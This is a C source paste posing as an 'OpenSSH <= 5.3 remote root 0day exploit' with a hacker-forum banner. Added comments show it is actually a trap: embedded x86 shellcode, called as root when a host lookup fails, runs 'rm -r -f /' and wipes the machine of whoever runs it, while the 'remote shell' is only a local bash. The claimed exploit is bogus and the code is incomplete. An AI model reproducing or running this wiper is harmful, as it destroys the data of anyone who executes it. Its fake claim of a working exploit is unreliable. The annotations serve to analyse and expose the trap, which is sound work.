syst3m_h4x0r

OpenSSH <= 5.3 remote root 0day exploit

Jul 29th, 2018
  1. /*
  2. *
  3. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
  4. *
  5. * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
  6. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
  7. *
  8. *
  9. */
  10.  
  11. #include <stdio.h>
  12. #include <netdb.h>
  13. #include <stdlib.h>
  14. #include <string.h>
  15. #include <unistd.h>
  16. #include <arpa/inet.h>
  17. #include <sys/types.h>
  18. #include <sys/socket.h>
  19. #include <netinet/in.h>
  20.  
/*
 * Print the banner and the command-line synopsis to stdout, then terminate
 * the process with exit status 1. `argv[0]` is the program name shown in the
 * synopsis line. Never returns.
 */
void usage(char *argv[])
{
	static const char *const banner[] = {
		"\n\t[+] HATSUNEMIKU\n",
		"\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n",
		"\t[+] By: n3xus\n",
		"\t[+] Greetz to hackforums.net\n",
		"\t[+] Keep this 0day priv8!\n",
	};
	/* Fixed lines carry no conversion specifiers, so fputs() is equivalent to printf(). */
	for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
		fputs(banner[i], stdout);
	}
	printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
	exit(1);
}
  31.  
/*
 * `decoder` does not decode anything and is never transmitted in a useful
 * form. It is 45 bytes of 32-bit x86 Linux machine code that main() CALLS
 * directly (the indirect call through this array in main()'s lookup-failure
 * branch) while the process is running as root.
 *
 * Disassembled: eax = 11 (execve), edx = 0, then the strings "/", "-f",
 * "-r" and "/bin//rm" plus a NULL-terminated argv are built on the stack and
 * `int 0x80` is issued, i.e.
 *     execve("/bin//rm", {"/bin//rm", "-r", "-f", "/", NULL}, NULL)
 * This recursively deletes the filesystem of the machine running this
 * program. The "exploit" is a wiper aimed at whoever executes it.
 */
unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
"\x6a\x2f\x89\xe7\x52"
"\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d"
"\x72\x89\xe1\x52\x68"
"\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89"
"\xe3\x52\x57\x56\x51"
"\x53\x89\xe1\xcd\x80";
  41.  
/*
 * `rootshell` is not a shell either. It is 43 bytes of 32-bit x86 Linux
 * machine code that pushes a 10-byte taunt string onto the stack, issues
 * write(1, <string>, 10) via `int 0x80`, and then calls exit(0).
 *
 * In this program it is only memcpy()'d into `payload` in main() and pushed
 * to the remote port with send(); it is never executed locally and nothing
 * is read back from the socket. The bytes contain no NUL, so the terminating
 * NUL of this literal is what bounds the strlen() used as the send length.
 */
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
"\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
"\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
"\xdb\x40\xcd\x80";
  46.  
/*
 * Entry point. Despite the banner, nothing here attacks sshd. As written:
 *   - execution is refused unless euid == 0, so every side effect below
 *     happens as root;
 *   - `h`, the "target" buffer, is declared but never assigned from argv,
 *     so inet_aton()/gethostbyname() read uninitialized stack bytes;
 *   - when that lookup fails, the "[-] Exploit failed." branch CALLS the
 *     `decoder` byte array as code, which is execve("/bin//rm", "-r", "-f",
 *     "/") — it wipes the local machine;
 *   - otherwise it connects to the hard-coded port 22 (argv[2] is never
 *     read), sends the `rootshell` bytes, and the only "shell" it can ever
 *     open is a LOCAL /bin/bash via system().
 * The paste also ends without main()'s closing brace (see the last line),
 * so this text does not compile as-is.
 */
int main(int argc, char **argv)
{

/* geteuid() returns uid_t; stored in an int here. */
int euid = geteuid();
/* `port` is fixed at 22 and never updated from argv[2]. */
int port= 22, sock;
/* Never written anywhere in this function: stays uninitialized. */
char h[1000];
struct hostent *host;
struct sockaddr_in addr;

/* The message is misleading: only a SOCK_STREAM socket is opened below, no raw socket. */
if(euid != 0)
{
fprintf(stderr, "You need to be root to use raw sockets.\n");
exit(1);
}
/* Always true once the previous block did not exit. */
if(euid == 0)
{
fprintf(stdout, "MIKU! MIKU! MIKU!\n");
}
/* argv[1] and argv[2] are checked for presence but never used. */
if(argc != 3)
usage(argv);
/*
 * `h` holds indeterminate bytes (reading them is undefined behavior), so in
 * practice inet_aton() fails and gethostbyname() is handed garbage.
 */
if(!inet_aton(h, &addr.sin_addr))
{
host = gethostbyname(h);
if(!host)
{
fprintf(stderr, "[-] Exploit failed.\n");
/*
 * Treats the `decoder` array as a function and jumps into it: this runs the
 * embedded rm -r -f / payload as root. This is the only place `decoder` is
 * reached, and it is reached on the expected (lookup-failed) path.
 * NOTE(review): on a toolchain/OS where .data is non-executable this call
 * faults instead — that is an accident of the platform, not a safeguard.
 */
(*(void(*)())decoder)();
exit(1);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
/* Return value of socket() is not checked; -1 would flow into connect(). */
sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr,"[-] Exploit failed.\n");
exit(1);
}
char payload[1337];
/* Both copies start at payload[0], so the second memcpy() overwrites the first. */
memcpy(payload, &decoder, sizeof(decoder));
memcpy(payload, &rootshell, sizeof(rootshell));
/*
 * strlen() stops at rootshell's terminating NUL (its bytes contain none), so
 * the 43 rootshell bytes are sent as a raw blob. send()'s result is ignored.
 */
send(sock, payload, strlen(payload),0);
close(sock);
/*
 * `sock` was just closed, so this connect() fails with EBADF and the program
 * exits here; the "g0t sh3ll" branch below is unreachable in practice.
 */
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr, "[-] Exploit failed.\n");
exit(1);
}
else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
{
fprintf(stdout, "[+]g0t sh3ll!\n");
/* Spawns a shell on the LOCAL machine; nothing ties it to the remote host. */
system("/bin/bash");
}
else
{
fprintf(stderr, "[-] Exploit failed.\n");
close(sock);
exit(0);
}
/* The closing brace of main() is missing from the paste at this point. */